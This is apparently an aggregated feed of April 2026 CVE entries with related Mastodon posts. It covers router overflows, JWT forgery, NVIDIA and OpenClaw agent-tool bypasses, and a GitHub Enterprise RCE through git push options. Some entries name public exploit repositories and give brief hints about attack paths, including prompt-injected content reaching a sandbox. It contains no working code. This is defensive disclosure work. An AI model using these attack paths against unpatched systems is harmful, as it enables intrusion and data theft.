NVIDIA NemoClaw contains a vulnerability in the validateEndpointUrl() SSRF protection component, where an attacker could cause a server-side request forgery by supplying a crafted endpoint URL referencing the 0.0.0.0/8 address range through a blueprint configuration file or CLI flag. A successful exploit of this vulnerability may lead to information disclosure.

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-7289
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:25:44.987000

1 post

A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the function sub_414BA8 of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url results in buffer overflow. The attack can be executed remotely. The exploit has been made public and could be used.

thehackerwire@mastodon.social at 2026-04-28T23:38:03.000Z ##

🟠 CVE-2026-7289 - High (8.8)

A vulnerability was found in D-Link DIR-825M 1.1.12. This issue affects the function sub_414BA8 of the file /boafrm/formWanConfigSetup. The manipulation of the argument submit-url results in buffer overflow. The attack can be executed remotely. Th...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7288
(8.8 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:25:44.987000

1 posts

A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability affects the function sub_4151FC of the file /boafrm/formVpnConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used.

thehackerwire@mastodon.social at 2026-04-28T23:28:00.000Z ##

🟠 CVE-2026-7288 - High (8.8)

A vulnerability has been found in D-Link DIR-825M 1.1.12. This vulnerability affects the function sub_4151FC of the file /boafrm/formVpnConfigSetup. The manipulation of the argument submit-url leads to buffer overflow. Remote exploitation of the a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-38651
(8.2 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:23:20.703000

1 posts

Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key and use it to impersonate any host in the network, gaining access to sensitive information

thehackerwire@mastodon.social at 2026-04-28T22:34:34.000Z ##

🟠 CVE-2026-38651 - High (8.2)

Authentication Bypass vulnerability exists in Netmaker versions prior to 1.5.0. The VerifyHostToken function in logic/jwts.go fails to validate the JWT signature when verifying host tokens. An attacker can forge a JWT signed with any arbitrary key...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-7279
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-28T20:22:38.260000

1 posts

AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a malicious DLL in a specific directory, resulting in arbitrary code execution with system privileges when the system loads the DLL.

thehackerwire@mastodon.social at 2026-04-29T01:00:07.000Z ##

🟠 CVE-2026-7279 - High (7.8)

AVACAST developed by eMPIA Technology, has a DLL Hijacking vulnerability, allowing authenticated local attackers to place a malicious DLL in a specific directory, resulting in arbitrary code execution with system privileges when the system loads t...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2025-67223
(7.5 HIGH)

EPSS: 0.13%

updated 2026-04-28T20:18:13.020000

1 posts

The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtual paths of uploaded files and bypass access controls to download sensitive documents containing PII.

1 repos

https://github.com/brandonperezlara/CVE-2025-67223

thehackerwire@mastodon.social at 2026-04-29T00:15:55.000Z ##

🟠 CVE-2025-67223 - High (7.5)

The Aranda File Server (AFS) component in Aranda Software Aranda Service Desk before 8.3.12 stores daily activity logs with predictable names in a publicly accessible directory, which allows unauthenticated remote attackers to obtain direct virtua...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40976
(9.1 CRITICAL)

EPSS: 0.04%

updated 2026-04-28T20:11:56.713000

1 posts

In certain circumstances, Spring Boot's default web security is ineffective allowing unauthorized access to all endpoints. For an application to be vulnerable, it must: be a servlet-based web application; have no Spring Security configuration of its own and rely on the default web security filter chain; depend on spring-boot-actuator-autoconfigure; not depend on spring-boot-health. If any of the a

beyondmachines1@infosec.exchange at 2026-04-29T09:01:29.000Z ##

Spring Boot Security Update Patches Critical Authentication Bypass and RCE Flaws

Spring Boot reports three vulnerabilities, including a critical authentication bypass (CVE-2026-40976) and flaws allowing session hijacking or remote code execution via timing attacks.

**If you use Spring Boot, upgrade ASAP to a patched version (4.0.6, 3.5.14, 3.4.16, 3.3.19, or 2.7.33). Until patched, restrict access to your applications from trusted networks only and disable DevTools and Actuator endpoints in production.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

CVE-2026-24186
(8.8 HIGH)

EPSS: 0.06%

updated 2026-04-28T20:10:42.070000

2 posts

NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause deserialization of untrusted data by sending a malicious FOBS-encoded message. A successful exploit of this vulnerability might lead to code execution.

thehackerwire@mastodon.social at 2026-04-28T22:33:32.000Z ##

🟠 CVE-2026-24186 - High (8.8)

NVIDIA FLARE SDK contains a vulnerability in FOBS, where an attacker may cause deserialization of untrusted data by sending a malicious FOBS-encoded message. A successful exploit of this vulnerability might lead to code execution.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-24178
(9.8 CRITICAL)

EPSS: 0.14%

updated 2026-04-28T20:10:42.070000

2 posts

NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to privilege escalation, data tampering, information disclosure, code execution, and denial of service.

thehackerwire@mastodon.social at 2026-04-28T22:33:22.000Z ##

🔴 CVE-2026-24178 - Critical (9.8)

NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key. A successful exploit of this vulnerability may lead to...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-24204
(6.5 MEDIUM)

EPSS: 0.04%

updated 2026-04-28T20:10:42.070000

1 posts

NVIDIA Flare SDK contains a vulnerability where an Attacker may cause an Improper Input Validation by path traversing. A successful exploit of this vulnerability may lead to information disclosure.

AAKL@infosec.exchange at 2026-04-28T16:53:25.000Z ##

Nvidia has posted two advisories:

"NVIDIA NVFlare Dashboard contains a vulnerability in the user management and authentication system where an unauthenticated attacker may cause authorization bypass through user-controlled key."

- Critical: CVE-2026-24178, CVE-2026-24186, and CVE-2026-24204: NVIDIA FLARE SDK - April 2026 nvidia.custhelp.com/app/answer

"NVIDIA NemoClaw contains a vulnerability in the sandbox environment initialization component where a remote attacker may cause improper access control by sending prompt-injected content."

- High: CVE-2026-24222 and CVE-2026-24231: nvidia.custhelp.com/app/answer #Nvidia #infoec #vulnerability

##

CVE-2026-3893
(9.4 CRITICAL)

EPSS: 0.06%

updated 2026-04-28T20:10:23.367000

1 posts

The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing an attacker with network access to directly access and modify its configuration and operational functions without needing credentials.

thehackerwire@mastodon.social at 2026-04-28T22:31:41.000Z ##

🔴 CVE-2026-3893 - Critical (9.4)

The Carlson VASCO-B GNSS Receiver lacks an authentication mechanism, allowing an attacker with network access to directly access and modify its configuration and operational functions without needing credentials.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41384
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.3.24 contains an environment variable injection vulnerability in the CLI backend runner that allows attackers to inject malicious environment variables through workspace configuration. Attackers can craft malicious workspace configs to inject arbitrary environment variables into the backend process spawning, enabling code execution or sensitive data exposure.

thehackerwire@mastodon.social at 2026-04-28T22:30:33.000Z ##

🟠 CVE-2026-41384 - High (7.8)

OpenClaw before 2026.3.24 contains an environment variable injection vulnerability in the CLI backend runner that allows attackers to inject malicious environment variables through workspace configuration. Attackers can craft malicious workspace c...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41383
(8.1 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.4.2 contains an arbitrary directory deletion vulnerability in mirror mode that allows attackers to delete remote directories by influencing remoteWorkspaceDir and remoteAgentWorkspaceDir configuration values. Attackers can manipulate these OpenShell config paths to cause mirror sync operations to delete unintended remote directory contents and replace them with uploaded worksp

thehackerwire@mastodon.social at 2026-04-28T22:00:22.000Z ##

🟠 CVE-2026-41383 - High (8.1)

OpenClaw before 2026.4.2 contains an arbitrary directory deletion vulnerability in mirror mode that allows attackers to delete remote directories by influencing remoteWorkspaceDir and remoteAgentWorkspaceDir configuration values. Attackers can man...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41394
(8.2 HIGH)

EPSS: 0.05%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.3.31 contains an authentication bypass vulnerability where unauthenticated plugin-auth HTTP routes receive operator runtime write scopes. Attackers can access these routes without authentication to perform privileged runtime actions intended for authorized operators.

thehackerwire@mastodon.social at 2026-04-28T22:00:01.000Z ##

🟠 CVE-2026-41394 - High (8.2)

OpenClaw before 2026.3.31 contains an authentication bypass vulnerability where unauthenticated plugin-auth HTTP routes receive operator runtime write scopes. Attackers can access these routes without authentication to perform privileged runtime a...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41396
(7.8 HIGH)

EPSS: 0.01%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_BUNDLED_PLUGINS_DIR environment variable, compromising plugin trust verification. Attackers with control over workspace configuration can inject malicious plugins by overriding the bundled plugin trust root directory.

thehackerwire@mastodon.social at 2026-04-28T21:49:48.000Z ##

🟠 CVE-2026-41396 - High (7.8)

OpenClaw before 2026.3.31 allows workspace .env files to override the OPENCLAW_BUNDLED_PLUGINS_DIR environment variable, compromising plugin trust verification. Attackers with control over workspace configuration can inject malicious plugins by ov...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41912
(7.6 HIGH)

EPSS: 0.03%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access restricted resources.

thehackerwire@mastodon.social at 2026-04-28T21:14:03.000Z ##

🟠 CVE-2026-41912 - High (7.6)

OpenClaw before 2026.4.8 contains a server-side request forgery policy bypass vulnerability allowing attackers to trigger navigations bypassing normal SSRF checks. Attackers can exploit browser interactions to bypass SSRF protections and access re...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42426
(8.8 HIGH)

EPSS: 0.03%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.4.8 contains an improper authorization vulnerability where the node.pair.approve method accepts operator.write scope instead of the narrower operator.pairing scope, allowing unprivileged users to approve node pairing. Attackers with operator.write permissions can bypass pairing approval restrictions to gain unauthorized access to exec-capable nodes.

thehackerwire@mastodon.social at 2026-04-28T21:02:23.000Z ##

🟠 CVE-2026-42426 - High (8.8)

OpenClaw before 2026.4.8 contains an improper authorization vulnerability where the node.pair.approve method accepts operator.write scope instead of the narrower operator.pairing scope, allowing unprivileged users to approve node pairing. Attacker...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42423
(7.5 HIGH)

EPSS: 0.04%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that bypasses strictInlineEval explicit-approval requirements on gateway and node exec hosts. Attackers can exploit this timeout fallback to execute inline eval commands that should require explicit user approval, circumventing the intended security boundary.

thehackerwire@mastodon.social at 2026-04-28T21:00:33.000Z ##

🟠 CVE-2026-42423 - High (7.5)

OpenClaw before 2026.4.8 contains an approval-timeout fallback mechanism that bypasses strictInlineEval explicit-approval requirements on gateway and node exec hosts. Attackers can exploit this timeout fallback to execute inline eval commands that...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42431
(8.1 HIGH)

EPSS: 0.03%

updated 2026-04-28T20:10:23.367000

1 posts

OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke(browser.proxy) that allows mutation of persistent browser profiles. Attackers can exploit this path to circumvent the browser.request persistent profile-mutation guard and modify browser configurations.

thehackerwire@mastodon.social at 2026-04-28T21:00:05.000Z ##

🟠 CVE-2026-42431 - High (8.1)

OpenClaw before 2026.4.8 contains a security bypass vulnerability in node.invoke(browser.proxy) that allows mutation of persistent browser profiles. Attackers can exploit this path to circumvent the browser.request persistent profile-mutation guar...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-40473
(8.8 HIGH)

EPSS: 0.11%

updated 2026-04-28T19:43:05.663000

1 posts

The camel-mina component's MinaConverter.toObjectInput(IoBuffer) type converter wraps an IoBuffer in a java.io.ObjectInputStream without applying any ObjectInputFilter or class-loading restrictions. When a Camel route uses camel-mina as a TCP or UDP consumer and requests conversion to ObjectInput (for example via getBody(ObjectInput.class) or @Body ObjectInput), an attacker sending a crafted seria

1 repos

https://github.com/dinosn/apache-camel

Matchbook3469@mastodon.social at 2026-04-29T23:29:05.000Z ##

🟠 New security advisory:

CVE-2026-40473 affects multiple systems.

• Impact: Significant security breach potential
• Risk: Unauthorized access or data exposure
• Mitigation: Apply patches within 24-48 hours

Full breakdown:
yazoul.net/advisory/cve/cve-20

#InfoSec #VulnerabilityManagement #CyberSec

##

CVE-2026-3854
(8.8 HIGH)

EPSS: 0.35%

updated 2026-04-28T19:37:39.507000

30 posts

An improper neutralization of special elements vulnerability was identified in GitHub Enterprise Server that allowed an attacker with push access to a repository to achieve remote code execution on the instance. During a git push operation, user-supplied push option values were not properly sanitized before being included in internal service headers. Because the internal header format used a delim

4 repos

https://github.com/5kr1pt/CVE-2026-3854

https://github.com/LACHHAB-Anas/Exploit_CVE-2026-3854

https://github.com/lysophavin18/CVE-2026-3854-PoC

https://github.com/simondankelmann/cve-2026-3854-test

bortzmeyer@mastodon.gougere.fr at 2026-04-30T11:52:29.000Z ##

@ben @jpmens Yes, executing commands with parameters given by the user, without any escaping. wiz.io/blog/github-rce-vulnera

##

mastokukei@social.josko.org at 2026-04-30T09:02:02.000Z ##

Blip blop, I'm a #mastobot.
Here is a summary (in beta) of the latest posts in #programmingAtKukei masto.kukei.eu/browse/programm category:
- **AI coding tools and controversies**: Discussions on Claude Code deleting databases, GitHub Copilot’s usage-based billing, and AI-generated code ownership debates.
- **GitHub reliability and alternatives**: Criticism of GitHub’s frequent outages, security vulnerabilities (e.g., CVE-2026-31431, CVE-2026-3854), and migrations to alternatives like [1/3]

##

mackuba@martianbase.net at 2026-04-29T20:47:26.000Z ##

Uh… this seems bad wiz.io/blog/github-rce-vulnera

##

CuratedHackerNews@mastodon.social at 2026-04-29T16:21:04.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

wiz.io/blog/github-rce-vulnera

#github

##

beyondmachines1@infosec.exchange at 2026-04-29T15:01:43.000Z ##

GitHub Patches Critical RCE Vulnerability in GitHub.com and GitHub Enterprise Server

GitHub patched a critical RCE vulnerability (CVE-2026-3854) in its internal git infrastructure that allowed authenticated users to compromise backend servers and access millions of repositories.

**If you run GitHub Enterprise Server (version 3.19.1 or earlier), upgrade immediately to a patched version (3.14.25, 3.15.20, 3.16.16, 3.17.13, 3.18.8, 3.19.4, 3.20.0, or later) since nearly 90% of instances are still unpatched. Also check your audit logs at `/var/log/github-audit.log` for push operations with unusual special characters in option values to spot any exploitation attempts; if you use GitHub.com or GitHub Enterprise Cloud, no action is needed since GitHub already fixed it.**
#cybersecurity #infosec #advisory #vulnerability
beyondmachines.net/event_detai

##

nixCraft@mastodon.social at 2026-04-29T14:31:29.000Z ##

With Microsoft pushing AI slop & bots hard into every product without any verification and accountability, I am not surprised a bug like this now exists. Critical GitHub RCE bug exposed millions of repositories, including private ones that business users like to keep private. GitHub Enterprise Server allowed an attacker with push access to a repository to achieve remote code execution on the instance nvd.nist.gov/vuln/detail/CVE-2

##

F30@chaos.social at 2026-04-29T11:58:04.000Z ##

"A single git push command was enough to exploit a flaw in GitHub's internal protocol and achieve code execution on backend infrastructure.
[…]
This research was made possible by AI-augmented reverse engineering tooling, particularly IDA MCP, which allowed us to rapidly analyze compiled binaries and reconstruct internal protocols at a speed that would not have been feasible manually."
wiz.io/blog/github-rce-vulnera

##

tisba@ruby.social at 2026-04-29T10:11:40.000Z ##

Aside from the abysmal uptime GitHub currently presents, they -also- had one of the worst security incidents you can think of: an RCE via a simple "git push" with total loss of tenant isolation (via wiz.io/blog/github-rce-vulnera).

If GitHub weren't such a central piece of infrastructure, the current situation would be disastrous for their business.

I am afraid this is just the beginning. #github #security

##

benzogaga33@mamot.fr at 2026-04-29T09:40:03.000Z ##

This GitHub flaw is exploitable with a simple Git Push (CVE-2026-3854) it-connect.fr/cette-faille-git #ActuCybersécurité #Cybersécurité #Vulnérabilité #GitHub

##

hnbest@mastodon.social at 2026-04-29T08:00:02.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

offseq@infosec.exchange at 2026-04-29T07:30:27.000Z ##

⚠️ CRITICAL: CVE-2026-3854 lets users with push access run arbitrary code on GitHub backend servers. Impacts GitHub.com & Enterprise Server. GitHub.com patched 2026-03-04; ES patch 2026-03-10. Patch ASAP! No wild exploits found. radar.offseq.com/threat/critic #OffSeq #GitHub #Infosec

##

hn250@social.lansky.name at 2026-04-29T02:10:12.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

wwahammy@treehouse.systems at 2026-04-29T01:20:29.000Z ##

There should be a "but the service is never up to be exploited" reducer on the CVE score.
wiz.io/blog/github-rce-vulnera

##

jschauma@mstdn.social at 2026-04-29T00:36:54.000Z ##

Question about the GitHub RCE:

wiz.io/blog/github-rce-vulnera says GHES patches were _released_ on 03/10.

github.blog/security/securing- says "we _prepared_ patches [...] and published CVE-2026-3854. These are _available today_".

So were GHES patches made available to customers at the time of CVE publication, or only today, 1.5 months later?

##

obivan@infosec.exchange at 2026-04-28T21:53:56.000Z ##

Wiz Research uncovers Remote Code Execution in GitHub.com and GitHub Enterprise Server (CVE-2026-3854) wiz.io/blog/github-rce-vulnera

##

hackersnews@mastodon.cesium.pw at 2026-04-28T20:30:11.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
news.ycombinator.com/item?id=4

#hackernews #tech

##

lobsters@mastodon.social at 2026-04-28T19:55:16.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown lobste.rs/s/8fxgx7 #security #vibecoding
wiz.io/blog/github-rce-vulnera

##

hn100@social.lansky.name at 2026-04-28T19:45:08.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

hn50@social.lansky.name at 2026-04-28T19:00:06.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

Link: wiz.io/blog/github-rce-vulnera
Discussion: news.ycombinator.com/item?id=4

##

newsycombinator@framapiaf.org at 2026-04-28T19:00:10.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown
Link: wiz.io/blog/github-rce-vulnera
Comments: news.ycombinator.com/item?id=4

##

Xavier@infosec.exchange at 2026-04-28T18:59:08.000Z ##

@GossiTheDog Here's a non-Twitter link: wiz.io/blog/github-rce-vulnera

##

blainsmith@fosstodon.org at 2026-04-28T18:58:41.000Z ##

HAHAHAHAHHAHAHAHAHAHAH wiz.io/blog/github-rce-vulnera

##

GossiTheDog@cyberplace.social at 2026-04-28T18:56:22.000Z ##

Wiz got RCE on the cloud version of Github.com and access to every customer environment.

To do this they just reversed the on prem version and found a simple vuln.

wiz.io/blog/github-rce-vulnera

##

hackerworkspace@infosec.exchange at 2026-04-28T18:27:48.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown | Wiz Blog

wiz.io/blog/github-rce-vulnera

Read on HackerWorkspace: hackerworkspace.com/article/gi

#aisecurity #vulnerability #exploit

##

ngate@mastodon.social at 2026-04-28T18:23:21.000Z ##

🎉 BREAKING NEWS: #Hackers discover GitHub's secret Easter egg, allowing anyone with a pulse to play "Command & Conquer" on their backend servers! 😂 A riveting tale of how to hack into the Matrix using nothing but a 'git' command — surely, Neo is quaking in his boots. 🕶️
wiz.io/blog/github-rce-vulnera #GitHub #EasterEgg #CommandAndConquer #HackingIntoTheMatrix #NeoQuaking #HackerNews #ngated

##

h4ckernews@mastodon.social at 2026-04-28T18:23:16.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

wiz.io/blog/github-rce-vulnera

#HackerNews #GitHub #RCE #Vulnerability #CVE-2026-3854 #Cybersecurity #Vulnerability #Analysis #InfoSec

##

CuratedHackerNews@mastodon.social at 2026-04-28T17:35:05.000Z ##

GitHub RCE Vulnerability: CVE-2026-3854 Breakdown

wiz.io/blog/github-rce-vulnera

#github

##

bortzmeyer@mastodon.gougere.fr at 2026-04-28T16:53:20.000Z ##

Many people will no doubt summarise the CVE-2026-3854 security flaw as "My God, all the software hosted on GitHub may have been compromised".

But, in fact, that was already possible: Microsoft (the owner of GitHub) could already modify everything.

All that CVE-2026-3854 enabled, if anyone exploited it, was to democratise that possibility by making it accessible to everyone with a GitHub account.

wiz.io/blog/github-rce-vulnera

##

CVE-2026-7320
(7.5 HIGH)

EPSS: 0.03%

updated 2026-04-28T18:31:36

1 posts

Information disclosure due to incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, and Firefox ESR 115.35.1.

thehackerwire@mastodon.social at 2026-04-28T23:38:12.000Z ##

🟠 CVE-2026-7320 - High (7.5)

Information disclosure due to incorrect boundary conditions in the Audio/Video component. This vulnerability was fixed in Firefox 150.0.1, Firefox ESR 140.10.1, and Firefox ESR 115.35.1.

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42432
(CVSS UNKNOWN)

EPSS: 0.02%

updated 2026-04-28T18:30:39

1 posts

Impact: Node Pairing Reconnect Command Escalation Bypasses operator.admin Scope Requirement. A previously paired node could reconnect with a broader command set, including exec-capable commands, without forcing the operator/admin re-pairing path. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service bounda

thehackerwire@mastodon.social at 2026-04-28T21:00:16.000Z ##

🟠 CVE-2026-42432 - High (7.8)

OpenClaw before 2026.4.8 contains a privilege escalation vulnerability allowing previously paired nodes to reconnect with exec-capable commands without operator.admin scope requirement. Attackers can bypass re-pairing authentication to execute pri...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-42422
(CVSS UNKNOWN)

EPSS: 0.04%

updated 2026-04-28T18:28:01

1 posts

Impact: OpenClaw `device.token.rotate` mints tokens for unapproved roles, bypassing device role-upgrade pairing. Device token rotation could mint or preserve roles/scopes that had not gone through the intended pairing approval. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. Affected Pa

thehackerwire@mastodon.social at 2026-04-28T21:13:45.000Z ##

🟠 CVE-2026-42422 - High (8.8)

OpenClaw before 2026.4.8 contains a role bypass vulnerability in the device.token.rotate function that allows minting tokens for unapproved roles. Attackers can bypass device role-upgrade pairing to preserve or mint roles and scopes that had not u...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41914
(CVSS UNKNOWN)

EPSS: 0.03%

updated 2026-04-28T18:26:36

1 posts

Impact: QQ Bot Extension: Missing SSRF Protection on All Media Fetch Paths. QQ Bot media download paths were not consistently routed through the SSRF guard and allowlist policy. OpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary. Affected Packages / Versions: Package: `openclaw` (npm); A

thehackerwire@mastodon.social at 2026-04-28T21:02:34.000Z ##

🟠 CVE-2026-41914 - High (8.5)

OpenClaw before 2026.4.8 contains a server-side request forgery vulnerability in QQ Bot media download paths that bypass SSRF protection. Attackers can exploit unprotected media fetch endpoints to access internal resources and bypass allowlist pol...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41405
(CVSS UNKNOWN)

EPSS: 0.14%

updated 2026-04-28T18:24:06

1 posts

Summary: MS Teams webhook parses body before JWT validation, enabling unauthenticated resource exhaustion. Current Maintainer Triage: Status: open; Normalized severity: medium; Assessment: v2026.3.28 still parses Teams JSON after only a Bearer-prefix gate and before real JWT validation, and the auth-before-parse fix is not yet shipped. Affected Packages / Versions: Package: `openclaw`

thehackerwire@mastodon.social at 2026-04-28T21:13:54.000Z ##

🟠 CVE-2026-41405 - High (7.5)

OpenClaw before 2026.3.31 parses MS Teams webhook request bodies before performing JWT validation, allowing unauthenticated attackers to trigger resource exhaustion. Remote attackers can send malicious Teams webhook payloads to exhaust server reso...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41404
(CVSS UNKNOWN)

EPSS: 0.07%

updated 2026-04-28T18:23:43

1 posts

Summary: Incomplete scope-clearing fix allows operator.admin escalation via trusted-proxy auth mode. Current Maintainer Triage: Normalized severity: high; Assessment: v2026.3.28 still misses trusted-proxy scope clearing for non-Control-UI clients, so self-declared operator scopes can survive on a real identity-bearing auth path; the complete fix is unreleased. Affected Packages / Versio

thehackerwire@mastodon.social at 2026-04-28T21:50:08.000Z ##

🟠 CVE-2026-41404 - High (8.8)

OpenClaw before 2026.3.31 contains an incomplete scope-clearing vulnerability in trusted-proxy authentication mode that allows operator.admin privilege escalation. Attackers can exploit this by declaring operator scopes on non-Control-UI clients, ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41399
(CVSS UNKNOWN)

EPSS: 0.05%

updated 2026-04-28T18:22:28

1 posts

## Summary The gateway accepted unbounded concurrent unauthenticated WebSocket upgrades before allocating them to an authenticated session budget. ## Impact An unauthenticated network attacker could consume socket and worker capacity and disrupt WebSocket availability for legitimate clients. ## Affected Component `src/gateway/server-http.ts, src/gateway/server/preauth-connection-budget.ts` #

thehackerwire@mastodon.social at 2026-04-28T21:49:58.000Z ##

🟠 CVE-2026-41399 - High (7.5)

OpenClaw before 2026.3.28 accepts unbounded concurrent unauthenticated WebSocket upgrades without pre-authentication budget allocation. Unauthenticated network attackers can exhaust socket and worker capacity to disrupt WebSocket availability for ...

🔗 thehackerwire.com/vulnerabilit

#CVE #vulnerability #infosec #cybersecurity #security #Tenda #patchstack

##

CVE-2026-41395
